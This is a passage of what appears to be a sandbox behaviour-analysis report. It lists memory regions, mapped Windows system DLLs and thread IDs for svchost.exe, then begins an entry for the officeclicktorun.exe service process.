5861 start_va = 0x7ff787bf2000 end_va = 0x7ff787bf3fff entry_point = 0x0 region_type = private name = "private_0x00007ff787bf2000" filename = "" Region: id = 5862 start_va = 0x7ff787bf4000 end_va = 0x7ff787bf5fff entry_point = 0x0 region_type = private name = "private_0x00007ff787bf4000" filename = "" Region: id = 5863 start_va = 0x7ff787bf6000 end_va = 0x7ff787bf7fff entry_point = 0x0 region_type = private name = "private_0x00007ff787bf6000" filename = "" Region: id = 5864 start_va = 0x7ff787bf8000 end_va = 0x7ff787bf9fff entry_point = 0x0 region_type = private name = "private_0x00007ff787bf8000" filename = "" Region: id = 5865 start_va = 0x7ff787bfa000 end_va = 0x7ff787bfbfff entry_point = 0x0 region_type = private name = "private_0x00007ff787bfa000" filename = "" Region: id = 5866 start_va = 0x7ff787bfc000 end_va = 0x7ff787bfdfff entry_point = 0x0 region_type = private name = "private_0x00007ff787bfc000" filename = "" Region: id = 5867 start_va = 0x7ff787bfe000 end_va = 0x7ff787bfffff entry_point = 0x0 region_type = private name = "private_0x00007ff787bfe000" filename = "" Region: id = 5868 start_va = 0x7ff787c00000 end_va = 0x7ff787c01fff entry_point = 0x0 region_type = private name = "private_0x00007ff787c00000" filename = "" Region: id = 5869 start_va = 0x7ff787c02000 end_va = 0x7ff787c03fff entry_point = 0x0 region_type = private name = "private_0x00007ff787c02000" filename = "" Region: id = 5870 start_va = 0x7ff787c06000 end_va = 0x7ff787c07fff entry_point = 0x0 region_type = private name = "private_0x00007ff787c06000" filename = "" Region: id = 5871 start_va = 0x7ff787c08000 end_va = 0x7ff787c09fff entry_point = 0x0 region_type = private name = "private_0x00007ff787c08000" filename = "" Region: id = 5872 start_va = 0x7ff787c0a000 end_va = 0x7ff787c0bfff entry_point = 0x0 region_type = private name = "private_0x00007ff787c0a000" filename = "" Region: id = 5873 start_va = 0x7ff787c0c000 end_va = 0x7ff787c0dfff entry_point = 0x0 region_type = private name = "private_0x00007ff787c0c000" filename = "" Region: id = 5874 start_va = 0x7ff787c0e000 end_va = 0x7ff787c0ffff entry_point = 0x0 region_type = private name = "private_0x00007ff787c0e000" filename = "" Region: id = 5875 start_va = 0x7ff787c10000 end_va = 0x7ff787d0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff787c10000" filename = "" Region: id = 5876 start_va = 0x7ff787d10000 end_va = 0x7ff787d32fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff787d10000" filename = "" Region: id = 5877 start_va = 0x7ff787d34000 end_va = 0x7ff787d34fff entry_point = 0x0 region_type = private name = "private_0x00007ff787d34000" filename = "" Region: id = 5878 start_va = 0x7ff787d38000 end_va = 0x7ff787d39fff entry_point = 0x0 region_type = private name = "private_0x00007ff787d38000" filename = "" Region: id = 5879 start_va = 0x7ff787d3a000 end_va = 0x7ff787d3bfff entry_point = 0x0 region_type = private name = "private_0x00007ff787d3a000" filename = "" Region: id = 5880 start_va = 0x7ff787d3c000 end_va = 0x7ff787d3dfff entry_point = 0x0 region_type = private name = "private_0x00007ff787d3c000" filename = "" Region: id = 5881 start_va = 0x7ff787d3e000 end_va = 0x7ff787d3ffff entry_point = 0x0 region_type = private name = "private_0x00007ff787d3e000" filename = "" Region: id = 5882 start_va = 0x7ff787ec0000 end_va = 0x7ff787eccfff entry_point = 0x7ff787ec0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 5883 start_va = 0x7ffae8b60000 end_va = 0x7ffae8fc9fff entry_point = 0x7ffae8b60000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 5884 start_va = 0x7ffaea120000 end_va = 0x7ffaea132fff entry_point = 0x7ffaea120000 region_type = mapped_file name = "srumapi.dll" filename = "\\Windows\\System32\\srumapi.dll" (normalized: "c:\\windows\\system32\\srumapi.dll") Region: id = 5885 start_va = 0x7ffaea140000 end_va = 0x7ffaea152fff entry_point = 0x7ffaea140000 region_type = mapped_file name = "energyprov.dll" filename = "\\Windows\\System32\\energyprov.dll" (normalized: "c:\\windows\\system32\\energyprov.dll") Region: id = 5886 start_va = 0x7ffaea960000 end_va = 0x7ffaea96cfff entry_point = 0x7ffaea960000 region_type = mapped_file name = "ncuprov.dll" filename = "\\Windows\\System32\\ncuprov.dll" (normalized: "c:\\windows\\system32\\ncuprov.dll") Region: id = 5887 start_va = 0x7ffaea970000 end_va = 0x7ffaea97dfff entry_point = 0x7ffaea970000 region_type = mapped_file name = "wpnsruprov.dll" filename = "\\Windows\\System32\\wpnsruprov.dll" (normalized: "c:\\windows\\system32\\wpnsruprov.dll") Region: id = 5888 start_va = 0x7ffaeaf30000 end_va = 0x7ffaeaf4cfff entry_point = 0x7ffaeaf30000 region_type = mapped_file name = "radardt.dll" filename = "\\Windows\\System32\\radardt.dll" (normalized: "c:\\windows\\system32\\radardt.dll") Region: id = 5889 start_va = 0x7ffaeaf50000 end_va = 0x7ffaeaf66fff entry_point = 0x7ffaeaf50000 region_type = mapped_file name = "appsruprov.dll" filename = "\\Windows\\System32\\appsruprov.dll" (normalized: "c:\\windows\\system32\\appsruprov.dll") Region: id = 5890 start_va = 0x7ffaeaf70000 end_va = 0x7ffaeaf8afff entry_point = 0x7ffaeaf70000 region_type = mapped_file name = "eeprov.dll" filename = "\\Windows\\System32\\eeprov.dll" (normalized: "c:\\windows\\system32\\eeprov.dll") Region: id = 5891 start_va = 0x7ffaeaf90000 end_va = 0x7ffaeafa4fff entry_point = 0x7ffaeaf90000 region_type = mapped_file name = "nduprov.dll" filename = "\\Windows\\System32\\nduprov.dll" (normalized: "c:\\windows\\system32\\nduprov.dll") Region: id = 5892 start_va = 0x7ffaeb090000 end_va = 0x7ffaeb371fff entry_point = 0x7ffaeb090000 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 5893 start_va = 0x7ffaeb380000 end_va = 0x7ffaeb388fff entry_point = 0x7ffaeb380000 region_type = mapped_file name = "pnpts.dll" filename = "\\Windows\\System32\\pnpts.dll" (normalized: "c:\\windows\\system32\\pnpts.dll") Region: id = 5894 start_va = 0x7ffaeb390000 end_va = 0x7ffaeb4f5fff entry_point = 0x7ffaeb390000 region_type = mapped_file name = "diagperf.dll" filename = "\\Windows\\System32\\diagperf.dll" (normalized: "c:\\windows\\system32\\diagperf.dll") Region: id = 5895 start_va = 0x7ffaeb520000 end_va = 0x7ffaeb52dfff entry_point = 0x7ffaeb520000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 5896 start_va = 0x7ffaeb600000 end_va = 0x7ffaeb637fff entry_point = 0x7ffaeb600000 region_type = mapped_file name = "srumsvc.dll" filename = "\\Windows\\System32\\srumsvc.dll" (normalized: "c:\\windows\\system32\\srumsvc.dll") Region: id = 5897 start_va = 0x7ffaeb690000 end_va = 0x7ffaeb6eefff entry_point = 0x7ffaeb690000 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 5898 start_va = 0x7ffaeb6f0000 end_va = 0x7ffaeb6f9fff entry_point = 0x7ffaeb6f0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 5899 start_va = 0x7ffaec140000 end_va = 0x7ffaec17efff entry_point = 0x7ffaec140000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 5900 start_va = 0x7ffaec400000 end_va = 0x7ffaec40bfff entry_point = 0x7ffaec400000 region_type = mapped_file name = "wfapigp.dll" filename = "\\Windows\\System32\\wfapigp.dll" (normalized: "c:\\windows\\system32\\wfapigp.dll") Region: id = 5901 start_va = 0x7ffaec7b0000 end_va = 0x7ffaec7b7fff entry_point = 0x7ffaec7b0000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 5902 start_va = 0x7ffaec7c0000 end_va = 0x7ffaec7c7fff entry_point = 0x7ffaec7c0000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 5903 start_va = 0x7ffaec7d0000 end_va = 0x7ffaec7d9fff entry_point = 0x7ffaec7d0000 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 5904 start_va = 0x7ffaecef0000 end_va = 0x7ffaecf0cfff entry_point = 0x7ffaecef0000 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 5905 start_va = 0x7ffaedb10000 end_va = 0x7ffaede85fff entry_point = 0x7ffaedb10000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 5906 start_va = 0x7ffaeef30000 end_va = 0x7ffaef03efff entry_point = 0x7ffaeef30000 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 5907 start_va = 0x7ffaef700000 end_va = 0x7ffaef72efff entry_point = 0x7ffaef700000 region_type = mapped_file name = "dps.dll" filename = "\\Windows\\System32\\dps.dll" (normalized: "c:\\windows\\system32\\dps.dll") Region: id = 5908 start_va = 0x7ffaef7a0000 end_va = 0x7ffaef7a9fff entry_point = 0x7ffaef7a0000 region_type = mapped_file name = "adhapi.dll" filename = "\\Windows\\System32\\adhapi.dll" (normalized: "c:\\windows\\system32\\adhapi.dll") Region: id = 5909 start_va = 0x7ffaef7b0000 end_va = 0x7ffaef841fff entry_point = 0x7ffaef7b0000 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 5910 start_va = 0x7ffaef850000 end_va = 0x7ffaef888fff entry_point = 0x7ffaef850000 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 5911 start_va = 0x7ffaef890000 end_va = 0x7ffaef898fff entry_point = 0x7ffaef890000 region_type = mapped_file name = "httpprxc.dll" filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll") Region: id = 5912 start_va = 0x7ffaef8a0000 end_va = 0x7ffaef8d4fff entry_point = 0x7ffaef8a0000 region_type = mapped_file name = "fwpolicyiomgr.dll" filename = "\\Windows\\System32\\fwpolicyiomgr.dll" (normalized: "c:\\windows\\system32\\fwpolicyiomgr.dll") Region: id = 5913 start_va = 0x7ffaef8e0000 end_va = 0x7ffaef9b9fff entry_point = 0x7ffaef8e0000 region_type = mapped_file name = "mpssvc.dll" filename = "\\Windows\\System32\\MPSSVC.dll" (normalized: "c:\\windows\\system32\\mpssvc.dll") Region: id = 5914 start_va = 0x7ffaef9c0000 end_va = 0x7ffaef9f5fff entry_point = 0x7ffaef9c0000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 5915 start_va = 0x7ffaefa00000 end_va = 0x7ffaefac9fff entry_point = 0x7ffaefa00000 region_type = mapped_file name = "bfe.dll" filename = "\\Windows\\System32\\BFE.DLL" (normalized: "c:\\windows\\system32\\bfe.dll") Region: id = 5916 start_va = 0x7ffaf02c0000 end_va = 0x7ffaf03b1fff entry_point = 0x7ffaf02c0000 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 5917 start_va = 0x7ffaf03c0000 end_va = 0x7ffaf045afff entry_point = 0x7ffaf03c0000 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 5918 start_va = 0x7ffaf07f0000 end_va = 0x7ffaf0809fff entry_point = 0x7ffaf07f0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 5919 start_va = 0x7ffaf0810000 end_va = 0x7ffaf0825fff entry_point = 0x7ffaf0810000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 5920 start_va = 0x7ffaf0920000 end_va = 0x7ffaf0987fff entry_point = 0x7ffaf0920000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 5921 start_va = 0x7ffaf1380000 end_va = 0x7ffaf1395fff entry_point = 0x7ffaf1380000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 5922 start_va = 0x7ffaf1640000 end_va = 0x7ffaf16fffff entry_point = 0x7ffaf1640000 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 5923 start_va = 0x7ffaf1880000 end_va = 0x7ffaf18e4fff entry_point = 0x7ffaf1880000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 5924 start_va = 0x7ffaf1940000 end_va = 0x7ffaf194afff entry_point = 0x7ffaf1940000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 5925 start_va = 0x7ffaf1960000 end_va = 0x7ffaf1997fff entry_point = 0x7ffaf1960000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 5926 start_va = 0x7ffaf2560000 end_va = 0x7ffaf2627fff entry_point = 0x7ffaf2560000 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 5927 start_va = 0x7ffaf2a00000 end_va = 0x7ffaf2a12fff entry_point = 0x7ffaf2a00000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 5928 start_va = 0x7ffaf2db0000 end_va = 0x7ffaf2dd6fff entry_point = 0x7ffaf2db0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 5929 start_va = 0x7ffaf3170000 end_va = 0x7ffaf31a1fff entry_point = 0x7ffaf3170000 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 5930 start_va = 0x7ffaf3360000 end_va = 0x7ffaf3382fff entry_point = 0x7ffaf3360000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 5931 start_va = 0x7ffaf3500000 end_va = 0x7ffaf3547fff entry_point = 0x7ffaf3500000 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 5932 start_va = 0x7ffaf35e0000 end_va = 0x7ffaf3637fff entry_point = 0x7ffaf35e0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 5933 start_va = 0x7ffaf36f0000 end_va = 0x7ffaf36fbfff entry_point = 0x7ffaf36f0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 5934 start_va = 0x7ffaf37e0000 end_va = 0x7ffaf3811fff entry_point = 0x7ffaf37e0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 5935 start_va = 0x7ffaf3960000 end_va = 0x7ffaf3992fff entry_point = 0x7ffaf3960000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 5936 start_va = 0x7ffaf3ab0000 end_va = 0x7ffaf3b57fff entry_point = 0x7ffaf3ab0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 5937 start_va = 0x7ffaf3ca0000 end_va = 0x7ffaf3cfcfff entry_point = 0x7ffaf3ca0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 5938 start_va = 0x7ffaf3d00000 end_va = 0x7ffaf3d16fff entry_point = 0x7ffaf3d00000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 5939 start_va = 0x7ffaf41b0000 end_va = 0x7ffaf41dbfff entry_point = 0x7ffaf41b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 5940 start_va = 0x7ffaf41e0000 end_va = 0x7ffaf41eafff entry_point = 0x7ffaf41e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 5941 start_va = 0x7ffaf4260000 end_va = 0x7ffaf4287fff entry_point = 0x7ffaf4260000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 5942 start_va = 0x7ffaf4290000 end_va = 0x7ffaf42fafff entry_point = 0x7ffaf4290000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 5943 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 5944 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 5945 start_va = 0x7ffaf4540000 end_va = 0x7ffaf4583fff entry_point = 0x7ffaf4540000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 5946 start_va = 0x7ffaf4bc0000 end_va = 0x7ffaf4c72fff entry_point = 0x7ffaf4bc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 5947 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5948 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5949 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5950 start_va = 0x7ffaf55b0000 end_va = 0x7ffaf56f0fff entry_point = 0x7ffaf55b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 5951 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5952 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5953 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 5954 start_va = 0x7ffaf6ec0000 end_va = 0x7ffaf6f64fff entry_point = 0x7ffaf6ec0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 5955 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5956 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 5957 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 5958 start_va = 0x7ffaf7560000 end_va = 0x7ffaf75c8fff entry_point = 0x7ffaf7560000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 5959 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5960 start_va = 0x7ffaf7680000 end_va = 0x7ffaf7687fff entry_point = 0x7ffaf7680000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5961 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 544 os_tid = 0x268 Thread: id = 545 os_tid = 0x73c Thread: id = 546 os_tid = 0x714 Thread: id = 547 os_tid = 0x710 Thread: id = 548 os_tid = 0x6b0 Thread: id = 549 os_tid = 0x680 Thread: id = 550 os_tid = 0x674 Thread: id = 551 os_tid = 0x5f8 Thread: id = 552 os_tid = 0x58c Thread: id = 553 os_tid = 0x588 Thread: id = 554 os_tid = 0x558 Thread: id = 555 os_tid = 0x530 Thread: id = 556 os_tid = 0x500 Thread: id = 557 os_tid = 0x4e4 Thread: id = 558 os_tid = 0x4d8 Thread: id = 559 os_tid = 0x4c4 Thread: id = 560 os_tid = 0x4bc Thread: id = 561 os_tid = 0x4b8 Thread: id = 562 os_tid = 0x4ac Thread: id = 563 os_tid = 0x4a8 Thread: id = 564 os_tid = 0x4a0 Thread: id = 565 os_tid = 0x498 Thread: id = 566 os_tid = 0x494 Thread: id = 567 os_tid = 0x490 Thread: id = 568 os_tid = 0x484 Thread: id = 569 os_tid = 0x450 Process: id = "51" image_name = "officeclicktorun.exe" filename = "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeclicktorun.exe" page_root = "0x6d57e000" os_pid = "0x4d0" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "38" os_parent_pid = "0x1e4" cmd_line = "\"C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeClickToRun.exe\" /service" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 5263 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5264 start_va = 0x61d040000 end_va = 0x61d04ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000061d040000" filename = "" Region: id = 5265 start_va = 0x61d050000 end_va = 0x61d056fff entry_point = 0x0 region_type = private name = "private_0x000000061d050000" filename = "" Region: id = 5266 start_va = 0x61d060000 end_va = 0x61d073fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000061d060000" filename = "" Region: id = 5267 start_va = 0x61d080000 end_va = 0x61d17ffff entry_point = 0x0 region_type = private name = "private_0x000000061d080000" filename = "" Region: id = 5268 start_va = 0x61d180000 end_va = 0x61d183fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000061d180000" filename = "" Region: id = 5269 start_va = 0x61d190000 end_va = 0x61d192fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000061d190000" filename = "" Region: id = 5270 start_va = 0x61d1a0000 end_va = 0x61d1a1fff entry_point = 0x0 region_type = private name = "private_0x000000061d1a0000" filename = "" Region: id = 5271 start_va = 0x61d1b0000 end_va = 0x61d26dfff entry_point = 0x61d1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5272 start_va = 0x61d270000 end_va = 0x61d276fff entry_point = 0x0 region_type = private name = "private_0x000000061d270000" filename = "" Region: id = 5273 start_va = 0x61d280000 end_va = 0x61d280fff entry_point = 0x0 region_type = private name = "private_0x000000061d280000" filename = "" Region: id = 5274 start_va = 0x61d290000 end_va = 0x61d290fff entry_point = 0x0 region_type = private name = "private_0x000000061d290000" filename = "" Region: id = 5275 start_va = 0x61d2a0000 end_va = 0x61d2a0fff entry_point = 0x0 region_type = private name = "private_0x000000061d2a0000" filename = "" Region: id = 5276 start_va = 0x61d2b0000 end_va = 0x61d2b0fff entry_point = 0x0 region_type = private name = "private_0x000000061d2b0000" filename = "" Region: id = 5277 start_va = 0x61d2c0000 end_va = 0x61d2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000061d2c0000" filename = "" Region: id = 5278 start_va = 0x61d2d0000 end_va = 0x61d2d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000061d2d0000" filename = "" Region: id = 5279 start_va = 0x61d2e0000 end_va = 0x61d2e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000061d2e0000" filename = "" Region: id = 5280 start_va = 0x61d2f0000 end_va = 0x61d2fffff entry_point = 0x0 region_type = private name = "private_0x000000061d2f0000" filename = "" Region: id = 5281 start_va = 0x61d300000 end_va = 0x61d300fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000061d300000" filename = "" Region: id = 5282 start_va = 0x61d310000 end_va = 0x61d310fff entry_point = 0x61d310000 region_type = mapped_file name = "counters.dat" filename = "\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\windows\\system32\\config\\systemprofile\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 5283 start_va = 0x61d320000 end_va = 0x61d324fff entry_point = 0x0 region_type = private name = "private_0x000000061d320000" filename = "" Region: id = 5284 start_va = 0x61d330000 end_va = 0x61d34afff entry_point = 0x61d330000 region_type = mapped_file name = "tdh.dll.mui" filename = "\\Windows\\System32\\en-US\\tdh.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tdh.dll.mui") Region: id = 5285 start_va = 0x61d350000 end_va = 0x61d350fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000061d350000" filename = "" Region: id = 5286 start_va = 0x61d360000 end_va = 0x61d45ffff entry_point = 0x0 region_type = private name = "private_0x000000061d360000" filename = "" Region: id = 5287 start_va = 0x61d470000 end_va = 0x61d56ffff entry_point = 0x0 region_type = private name = "private_0x000000061d470000" filename = "" Region: id = 5288 start_va = 0x61d760000 end_va = 0x61d8e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000061d760000" filename = "" Region: id = 5289 start_va = 0x61d8f0000 end_va = 